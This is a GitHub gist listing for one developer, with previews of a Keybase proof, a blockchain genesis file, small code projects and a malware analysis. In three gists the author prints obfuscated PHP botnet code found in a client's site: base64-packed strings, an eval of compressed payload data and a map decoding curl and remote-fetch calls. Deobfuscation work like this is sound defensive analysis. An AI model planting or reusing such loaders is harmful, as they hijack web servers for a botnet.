Ryan ryepdx

@ryepdx
ryepdx / keybase.md
Created Aug 7, 2014
Keybase verification
View keybase.md

Keybase proof

I hereby claim:

  • I am ryepdx on github.
  • I am ryepdx (https://keybase.io/ryepdx) on keybase.
  • I have a public key whose fingerprint is C901 BFF6 45AF 5CD0 6F58 D724 680F 5108 B06D BB77

To claim this, I am signing this object:

View gist:ee47a7db8e84a6d75df7
Verifying that +ryepdx is my openname (Bitcoin username). https://onename.io/ryepdx
@ryepdx
ryepdx / zero_genesis.json
Created Aug 7, 2015
A genesis block with no difficulty
View zero_genesis.json
{
"nonce": "0xdeadbeefdeadbeef",
"timestamp": "0x0",
"parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"extraData": "0x686f727365",
"gasLimit": "0x8000000",
"difficulty": "0x0",
"mixhash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"coinbase": "0x3333333333333333333333333333333333333333",
"alloc": {
@ryepdx
ryepdx / label_inside_input.opa
Created Oct 22, 2011
"Label inside input via title property" for Opa
View label_inside_input.opa
/***************************************
* 2nd day of playing around with Opa.
* 1st somewhat useful bit of code.
* Probably a better way to write this,
* but definitely don't want to reinvent
* this later. Would like to have this to
* build off of!
*
* Hope it helps you.
****************************************/
@ryepdx
ryepdx / index.js
Created Nov 4, 2012 — forked from maxogden/index.js
twitter bot for @sandyaid retweets
View index.js
var crypto = require('crypto')
var request = require('request')
var url = require('url')
var irc = require('./IRC/lib/irc') // https://github.com/gf3/IRC-js
var ntwitter = require('ntwitter')
var twitter = require('twitter')
var qs = require('querystring')
// separate accounts to post and search because twitter was sending me 500s
// when I tried to use the same oauth creds for both twitter() and ntwitter()
@ryepdx
ryepdx / gist:5015935
Created Feb 22, 2013
The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.
View gist:5015935
View TELLMESTRINGS.php
<?php
if (!function_exists('get_string')){
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5
View replace_get_string.py
replace_dict = {
'get_string(2, 6)': 'curl',
'get_string(9, 7)': '_init',
'get_string(17, 20)': 'allow_url_fopen',
'get_string(37, 2)': '1',
'get_string(39, 10)': 'http://',
'get_string(51, 30)': '&way=file_get_contents',
'get_string(82, 10)': '_setopt',
'get_string(95, 7)': '_exec',
@ryepdx
ryepdx / infection_raw.php
Created Feb 22, 2013
Found this botnet code in a client's codebase. Cleaned it up, then went about de-obfuscating it to figure out what it was doing. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_raw.php
<?php
/*versio:2.18*/$QQOO=0;if (!function_exists('Q0QQOOQO')){$GLOBALS['QQOO'] = 'hY3VybAX2luaXQ)W*YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLw TJndheT1maWxlX2dldF9jb250ZW50cw{aX3NldG9wdAHX2V4ZWMSaC~ujJndheT1jdXJsikSMnDCLwfpb3Nvbi5pbglYS1pbi1hLWNpcmNsZS5jb20.rYcGhwYWlkZS5jb20!dwJWV8DES~&OgGY{ZGlzcGxheV9lcnJvcnM*ZGV0ZXJtaW5hdG9yZnRwMTM.Mi4xOA~NUVFRT1EwT1EwT09RT1FPYmFzZTY0X2RlY29kZQRGYmFzZTY0X2VuY29kZQuSFRUUF9IT1NUdW5pb24XOO@b!c2VsZWN0MmUkVRVUVTVF9VUkkduVU0NSSVBUX05BTUUELQUVVFUllfU1RSSU5HPwq&dL3RtcC8uZm9udC11bml4kuzVE1QI VEVNUAVE1QRElSfCHC)dG1wd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQqdXBsb2FkX3RtcF9kaXIBXL3RtcAR@ LgJdmVyc2lvOLQnyLXBocAzPrjyLSFRUUF9FWEVDUEhQVvYb3V0kMUb2s=yLSFRUUF9VU0VSX0FHRU5UiqLAHRZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgIk$L3BnLnBocD91PQJms9JnQ9cGhwJnA9JnY9EZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlY0MXZvbGdRLzFkZVRkTkE0bklnNHNmMXVHaTY5a3JTazJwMWswM1hFRmVmTFZrRUEzamRwdkYvdjVsNUQzaFcycjJyVGNRMzgrWjdmak9FRzZhZHJma21qUGxhYTZ4NXp0TnRHQy96SkczbytpdmI3T05WSGlZeFV5bkJoaWNiN2R5eklpdnl
@ryepdx
ryepdx / infection_one_layer_down.php
Created Feb 22, 2013
Found this botnet code in a client's codebase. This is the code the first obfuscated layer was executing. (Whitespace added for your convenience.) http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_one_layer_down.php
<?php
/*versio:2.18*/
$III1=0;
if (!function_exists('IlI11lll')){
$GLOBALS['III1'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZ